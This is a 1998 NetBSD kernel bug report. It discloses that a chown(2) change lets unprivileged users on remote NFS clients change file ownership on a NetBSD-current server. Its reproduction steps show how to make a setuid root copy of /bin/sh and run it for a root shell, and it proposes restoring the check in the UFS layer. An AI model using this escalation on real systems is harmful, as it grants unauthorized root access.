Subject: kern/5106: recent chown(2) change indroduces security hazard
To: None <gnats-bugs@gnats.netbsd.org, jaw@Op.Net>
From: Jeff Weisberg <jaw@Op.Net>
List: netbsd-bugs
Date: 03/03/1998 11:19:51
>Number: 5106
>Category: kern
>Synopsis: recent chown(2) change dangerous in heterogenous nfs enviornment
>Confidential: yes
>Severity: critical
>Priority: high
>Responsible: kern-bug-people (Kernel Bug People)
>State: open
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Tue Mar 3 08:20:00 1998
>Last-Modified:
>Originator:
>Organization:
>Release: current - 1998/02
>Environment:
System: NetBSD pisarro.op.net 1.3C NetBSD 1.3C (PISARRO) #57: Wed Feb 18 09:41:24 EST 1998 jaw@pisarro.op.net:/usr/src/NetBSD-current/src/sys/arch/sparc/compile/PISARRO sparc
>Description:
the test as to whether we should actually change the owner of a file
was recently moved from "ufs_vnops.c/ufs_chown()" to
"vfs_syscalls.c/change_owner()"
consider the case of mounting a filesystem from a NetBSD-current based
box to a system not NetBSD-current based (either NetBSD-older, or any
non-NetBSD system):
I can now, as a non-privledged user on the 2nd system, chown(2) a
file mounted from the NetBSD-current box succesfully, as we now
take the following path through kernel-land:
chown() -> sys_chown() -> change_owner() -> nfs_setattr() ---->
to the current box:
nfsrv_setattr() -> ufs_setattr() -> ufs_chown()
the "don't let non-root people chown things" test is avoided completely.
this can be exploited to gain root privs.
>How-To-Repeat:
older % cd /dir-mounted-from-netbsd-current
older % cp /bin/sh .
older % chmod u+s sh
older % chown root:wheel sh
older % ls -lg sh
-rwsrwxr-x 1 root wheel 6113 Mar 1 10:13 sh
older % ./sh
older #
[note: chown(8) does not permit users to run it, a simple c or perl
prog replacement will suffice]
>Fix:
place the test back in the ufs layer. security-holics would likely suggest
(and I'd agree with them) that the test should be done in *both* places.
>Audit-Trail:
>Unformatted: